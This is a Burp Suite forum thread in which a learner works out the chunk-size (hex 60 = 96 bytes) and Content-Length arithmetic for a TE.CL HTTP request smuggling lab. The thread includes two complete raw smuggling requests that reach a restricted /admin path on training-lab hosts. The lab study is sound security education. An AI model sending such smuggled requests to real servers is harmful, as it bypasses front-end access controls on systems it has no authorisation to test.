Burp Suite User Forum

Login to post

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Luc | Last updated: Oct 05, 2020 03:06PM UTC

Good morning, The following request in the provided solution did work for me but I don't understand how it's calculated. POST / HTTP/1.1 Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 \r\n \r\n Those two ending "\r\n" and the correct length "60" are required, or else I got "Read timeout after 10000ms". My question is how is the number 60 is calculated. It's supposed to be the body content length of the smuggled request. Why is it not 22(first line) + 49(second line) + 20(third line) + 2(fourth blank line) + 5(line of "x=1") + 1 (number 0 without trailing \r\n) = 99? POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters) Content-Type: application/x-www-form-urlencoded -> 47 characters + 2 ending \r\n (49 characters) Content-Length: 15 -> 18 characters + 2 ending \r\n (20 characters) -> \r\n (2 characters) x=1 -> 3 + \r\n (5 characters) 0 -> 1 + \r\n (3 characters) \r\n -> \r\n (2 characters) \r\n -> \r\n (2 characters) And I don't understand how "Content-Length" 15" is calculated. I thought it shall be x=1\r\n (5 characters) + 0 (1 character) = 6 characters. Would you please help to explain why my calculations are wrong? Thanks in advance for your help. Regards, Luc

Uthman, PortSwigger Agent | Last updated: Oct 05, 2020 04:02PM UTC

Hi Luc, Thanks for your query. Unfortunately, we are unable to provide personal support or tutoring to Academy users, as we prefer to improve the experience for our entire userbase by focussing on expanding and refining our public content. The post will remain up so anyone in the community is free to reply. Have you taken a look at the learning materials and James' research on the topic? - https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn - https://portswigger.net/web-security/request-smuggling

Luc | Last updated: Oct 05, 2020 05:06PM UTC

Yes, I'm seen both learning materials and that is the reason I'm interested in this area and want to explorer more. Those two links don't help with this specific question. I would greatly appreciate if you or another user can help to answer the question since it sounds straightforward but I just don't get it.

Luc | Last updated: Oct 05, 2020 05:17PM UTC

Sorry I miss something. Chunk size is in bytes (expressed in hexadecimal) so 60 actually means 96. So it's 22(first line) + 49(second line) + 20(third line) + 2(fourth blank line) + 3(line of "x=1" without ending \r\n). However, I still don't understand why the smuggled request has a length 15 instead of 6. Could someone help to explain? Thanks.

Luc | Last updated: Oct 05, 2020 05:40PM UTC

Hi Uthman, The second content-length doesn't matter thus it doesn't seem to be calculated correctly. The following request got the same expected result: POST / HTTP/1.1 Host: ac641f531f428c008065478d00f200ed.web-security-academy.net Content-length: 4 Transfer-Encoding: chunked 5f POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 6 x=1 0 \r\n \r\n As we can tell, I can change the content-length from 15 to 6. Shall the example be updated to have a content-length of 6 instead of 15 to reduce confusion to all users? Please advise. Thanks, Luc

You need to Log in to post a reply. Or register here, for free.